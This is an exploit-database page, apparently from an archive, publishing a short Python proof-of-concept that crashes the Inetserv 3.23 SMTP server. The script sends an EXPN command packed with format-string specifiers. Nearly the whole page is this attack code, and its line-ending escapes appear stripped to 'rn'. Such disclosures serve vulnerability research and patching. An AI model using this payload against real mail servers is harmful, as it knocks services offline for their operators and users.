[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Inetserv 3.23 SMTP Denial of Service Vulnerability
# Published : 2011-01-23
# Author : G13
# Previous Title : Wireshark ZigBee ZCL Dissector Infinite Loop Denial of Service
# Next Title : Microsoft Fax Cover Page Editor <= 5.2.3790.3959 Double Free Memory Corruption


#!/usr/bin/python
# Exploit Title: Inetserv 3.23 SMTP DoS
# Date: 1/22/2011
# Author: G13
# Software Link: http://www.avtronics.net/inetserv.php
# Version: 3.23
# Tested on: WinXP SP0 Eng

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = "EXPN " + "%s" * 40 + "rn"

s.connect(('127.0.0.1',25))

data=s.recv(1024)
s.send("HELOrn")

s.send(buffer)

s.send("HELPrn")
s.close()